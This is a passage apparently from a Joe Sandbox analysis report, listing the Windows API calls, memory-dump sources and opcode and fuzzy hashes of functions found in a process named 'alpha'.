                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: wcstol$lstrcmp
                                                                                                  • String ID:
                                                                                                  • API String ID: 3515581199-0
                                                                                                  • Opcode ID: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                                                                                  • Instruction ID: fe0350bc71b218975c3e115c69ccdacf3f7c003035c8abe618f73bced4b07d5d
                                                                                                  • Opcode Fuzzy Hash: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                                                                                  • Instruction Fuzzy Hash: 0021DC36F0874293E6606B79D464139EBA1FF49741FE56078CB4F43EA4CEACE449C620
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                                                                                  • String ID:
                                                                                                  • API String ID: 2448200120-0
                                                                                                  • Opcode ID: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                                                                                  • Instruction ID: 0429a3c7fb78fdabe04ebd5097b80ba9f651f80460c3eb98939ff4fe5c70b7db
                                                                                                  • Opcode Fuzzy Hash: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                                                                                  • Instruction Fuzzy Hash: 2D212F31A1874687EB547B11A41027DFAA1FB84B82FF44179D94E47B95CFBCE841CB21
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$DriveNamePathTypeVolume
                                                                                                  • String ID:
                                                                                                  • API String ID: 1029679093-0
                                                                                                  • Opcode ID: d45035a7c6ac09dbba50d0c00beb4f85e1cca4574d2ac4f31282f71e25618f1f
                                                                                                  • Instruction ID: 92f75977243743235e416642b4b0d22a8b7efa97a3591a9f79424784f9657751
                                                                                                  • Opcode Fuzzy Hash: d45035a7c6ac09dbba50d0c00beb4f85e1cca4574d2ac4f31282f71e25618f1f
                                                                                                  • Instruction Fuzzy Hash: 0E318D32B05B818AEB709F62D8943E8B7A0FB89B85F944035CA4D47B44DF7CDA85C720
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Heap$AllocProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 1617791916-0
                                                                                                  • Opcode ID: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                                                                                  • Instruction ID: 9501b3d57d4bae5da748394033df777841a751370fa344e3a3c4326c81c091ff
                                                                                                  • Opcode Fuzzy Hash: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                                                                                  • Instruction Fuzzy Hash: F721A765608B4196EA04AB56E51007AFBA1FF89BD2BA49134CE1E03B95DF7CE445C730
                                                                                                  APIs
                                                                                                    • Part of subcall function 00007FF7823E3C24: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7823E3D0C
                                                                                                    • Part of subcall function 00007FF7823E3C24: towupper.MSVCRT ref: 00007FF7823E3D2F
                                                                                                    • Part of subcall function 00007FF7823E3C24: iswalpha.MSVCRT ref: 00007FF7823E3D4F
                                                                                                    • Part of subcall function 00007FF7823E3C24: towupper.MSVCRT ref: 00007FF7823E3D75
                                                                                                    • Part of subcall function 00007FF7823E3C24: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823E3DBF
                                                                                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823FEA0F,?,?,?,00007FF7823FE925,?,?,?,?,00007FF7823DB9B1), ref: 00007FF7823D6ABF
                                                                                                  • RtlFreeHeap.NTDLL ref: 00007FF7823D6AD3
                                                                                                    • Part of subcall function 00007FF7823D6B84: SetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,00007FF7823D6AE8,?,?,?,00007FF7823FEA0F,?,?,?,00007FF7823FE925), ref: 00007FF7823D6B8B
                                                                                                    • Part of subcall function 00007FF7823D6B84: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,00007FF7823D6AE8,?,?,?,00007FF7823FEA0F,?,?,?,00007FF7823FE925), ref: 00007FF7823D6B97
                                                                                                    • Part of subcall function 00007FF7823D6B84: RtlFreeHeap.NTDLL ref: 00007FF7823D6BAF
                                                                                                    • Part of subcall function 00007FF7823D6B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823D6AF1,?,?,?,00007FF7823FEA0F,?,?,?,00007FF7823FE925), ref: 00007FF7823D6B39
                                                                                                    • Part of subcall function 00007FF7823D6B30: RtlFreeHeap.NTDLL ref: 00007FF7823D6B4D
                                                                                                    • Part of subcall function 00007FF7823D6B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823D6AF1,?,?,?,00007FF7823FEA0F,?,?,?,00007FF7823FE925), ref: 00007FF7823D6B59
                                                                                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823FEA0F,?,?,?,00007FF7823FE925,?,?,?,?,00007FF7823DB9B1), ref: 00007FF7823D6B03
                                                                                                  • RtlFreeHeap.NTDLL ref: 00007FF7823D6B17
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Heap$Process$Free$towupper$CurrentDirectoryEnvironmentFullNamePathStringsiswalpha
                                                                                                  • String ID:
                                                                                                  • API String ID: 3512109576-0
                                                                                                  • Opcode ID: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                                                                                  • Instruction ID: f6d73ef160c3f89eb717c0651f905291ed42d34fda0d09525726b6400a516ec9
                                                                                                  • Opcode Fuzzy Hash: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                                                                                  • Instruction Fuzzy Hash: 5B21B761909A4285EB04FB66E4143B8BBA0FF59B46FA48075CA0E07751DF7CE845C770
                                                                                                  APIs
                                                                                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823DAF82), ref: 00007FF7823DB6D0
                                                                                                  • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823DAF82), ref: 00007FF7823DB6E7
                                                                                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823DAF82), ref: 00007FF7823DB701
                                                                                                  • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823DAF82), ref: 00007FF7823DB715
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Heap$Process$AllocSize
                                                                                                  • String ID:
                                                                                                  • API String ID: 2549470565-0
                                                                                                  • Opcode ID: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                                                                  • Instruction ID: a7fd67ad3b1dbf672da482765cbdd2bca0a08b9db6649024da461b6ecea9f216
                                                                                                  • Opcode Fuzzy Hash: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                                                                  • Instruction Fuzzy Hash: 1F218A65A09742D7EA54AB11E45407CFAA1FF44B82BE89475DA4E03F50DF7CE945C320
                                                                                                  APIs
                                                                                                  • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7823E507A), ref: 00007FF7823FD01C
                                                                                                  • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7823E507A), ref: 00007FF7823FD033
                                                                                                  • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7823E507A), ref: 00007FF7823FD06D
                                                                                                  • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7823E507A), ref: 00007FF7823FD07F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                                                                                  • String ID:
                                                                                                  • API String ID: 1033415088-0
                                                                                                  • Opcode ID: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                                                                                  • Instruction ID: de6de2ae812801f4b2c894766858642836a50032c6c44774fa09d1f592f4715b
                                                                                                  • Opcode Fuzzy Hash: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                                                                                  • Instruction Fuzzy Hash: 1711B232618A4287DB449B21F01417AFBE0FB8AB96F905135EA8E47F94DF7CC485CB20
                                                                                                  APIs
                                                                                                    • Part of subcall function 00007FF7823E1EA0: wcschr.MSVCRT(?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF782400D54), ref: 00007FF7823E1EB3
                                                                                                  • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823D5A2E
                                                                                                  • _open_osfhandle.MSVCRT ref: 00007FF7823D5A4F
                                                                                                  • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00008000,?,00000001,00007FF7823D260D), ref: 00007FF7823F37AA
                                                                                                  • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7823F37D2
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                                                                                                  • String ID:
                                                                                                  • API String ID: 22757656-0
                                                                                                  • Opcode ID: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                                                                                  • Instruction ID: 5e1c85edb0c8fd209f37bb75830c523bb63cc1a6d088ac637f20483c8fe93e25
                                                                                                  • Opcode Fuzzy Hash: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                                                                                  • Instruction Fuzzy Hash: 85119472A186458BE7506B24E45837DBAA0FB89B65FB44334D62E477D0CF7CD889CB20
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                  • String ID:
                                                                                                  • API String ID: 140117192-0
                                                                                                  • Opcode ID: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                                                                                  • Instruction ID: 8de1dce44fccc6abd824279fd0f56ecb6458d010e88964758e1991ab4ff9c6ad
                                                                                                  • Opcode Fuzzy Hash: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                                                                                  • Instruction Fuzzy Hash: 9821B735918B41D5E780AB05F880369B7B4FB88756FA00139EA8D47764DFBEE889C720
                                                                                                  APIs
                                                                                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF7823F5433,?,?,?,00007FF7823F69B8,?,?,?,?,?,00007FF7823E8C39), ref: 00007FF7823F56C5
                                                                                                  • RtlFreeHeap.NTDLL ref: 00007FF7823F56D9
                                                                                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF7823F5433,?,?,?,00007FF7823F69B8,?,?,?,?,?,00007FF7823E8C39), ref: 00007FF7823F56FD
                                                                                                  • RtlFreeHeap.NTDLL ref: 00007FF7823F5711
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Heap$FreeProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 3859560861-0
                                                                                                  • Opcode ID: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                                                                  • Instruction ID: 3d0682258b9adebaed305a728d0d801278772b6afd3a4b78ca74824b3ca4de52
                                                                                                  • Opcode Fuzzy Hash: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                                                                  • Instruction Fuzzy Hash: 7611F572A04B91C6EB009F56E4440A9BBA0FB89F85B999125DB4E03B18DF78E896C750
                                                                                                  APIs
                                                                                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823D8798), ref: 00007FF7823E4AD6
                                                                                                  • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823D8798), ref: 00007FF7823E4AEF
                                                                                                    • Part of subcall function 00007FF7823E4A14: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4A28
                                                                                                    • Part of subcall function 00007FF7823E4A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4A66
                                                                                                    • Part of subcall function 00007FF7823E4A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4A7D
                                                                                                    • Part of subcall function 00007FF7823E4A14: memmove.MSVCRT(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4A9A
                                                                                                    • Part of subcall function 00007FF7823E4A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7823E49F1), ref: 00007FF7823E4AA2
                                                                                                  • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7823D8798), ref: 00007FF7823EEE64
                                                                                                  • RtlFreeHeap.NTDLL ref: 00007FF7823EEE78
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Heap$Process$AllocEnvironmentFreeStrings$memmove
                                                                                                  • String ID:
                                                                                                  • API String ID: 2759988882-0
                                                                                                  • Opcode ID: a4ed9730d3c6c81ba5f221eab6fcc823e7ba38e65aafe0768b810c3c56661ab8
                                                                                                  • Instruction ID: 9927794454a7677ecf028cc7f5836e7d9a76cd972e3e20d97afcafd7711261c6
                                                                                                  • Opcode Fuzzy Hash: a4ed9730d3c6c81ba5f221eab6fcc823e7ba38e65aafe0768b810c3c56661ab8
                                                                                                  • Instruction Fuzzy Hash: F1F04F64A15B4296EB44B766D414178EDD1FF8EB42BE8C078CD0E43740EE7CA848C730
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ConsoleMode_get_osfhandle
                                                                                                  • String ID:
                                                                                                  • API String ID: 1606018815-0
                                                                                                  • Opcode ID: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                                                                                  • Instruction ID: f8fca250251c2bb4afede161027333b5ec1eeb5c629069a60297abae842b7148
                                                                                                  • Opcode Fuzzy Hash: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                                                                                  • Instruction Fuzzy Hash: 63F01C36A28A42CBE7446B11E444279FE60FB8AB03F949274DA0F03394DF7CD488CB60
                                                                                                  APIs
                                                                                                    • Part of subcall function 00007FF7823E06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823DB4DB), ref: 00007FF7823E06D6
                                                                                                    • Part of subcall function 00007FF7823E06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823DB4DB), ref: 00007FF7823E06F0
                                                                                                    • Part of subcall function 00007FF7823E06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823DB4DB), ref: 00007FF7823E074D
                                                                                                    • Part of subcall function 00007FF7823E06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823DB4DB), ref: 00007FF7823E0762
                                                                                                    • Part of subcall function 00007FF7823DEF40: iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF7823DE626,?,?,00000000,00007FF7823E1F69), ref: 00007FF7823DF000
                                                                                                    • Part of subcall function 00007FF7823DEF40: wcschr.MSVCRT(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823DF031
                                                                                                    • Part of subcall function 00007FF7823DEF40: iswdigit.MSVCRT(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823DF0D6
                                                                                                  • longjmp.MSVCRT ref: 00007FF7823ECCBC
                                                                                                  • longjmp.MSVCRT(?,?,00000000,00007FF7823E1F69,?,?,?,?,?,?,?,00007FF7823D286E,00000000,00000000,00000000,00000000), ref: 00007FF7823ECCE0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true
                                                                                                  • Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                  • Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Heap$AllocProcesslongjmp$iswdigitiswspacewcschr
                                                                                                  • String ID: GeToken: (%x) '%s'
                                                                                                  • API String ID: 3282654869-1994581435
                                                                                                  • Opcode ID: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
                                                                                                  • Instruction ID: 7b61cd67e8ddcab2408ed8c424b529c9d82f845491704bd68626486734819176
                                                                                                  • Opcode Fuzzy Hash: 69c34943887ae9b74dbb8ac009ab6e722a6e47999aa419ff77bc8c62eb614955
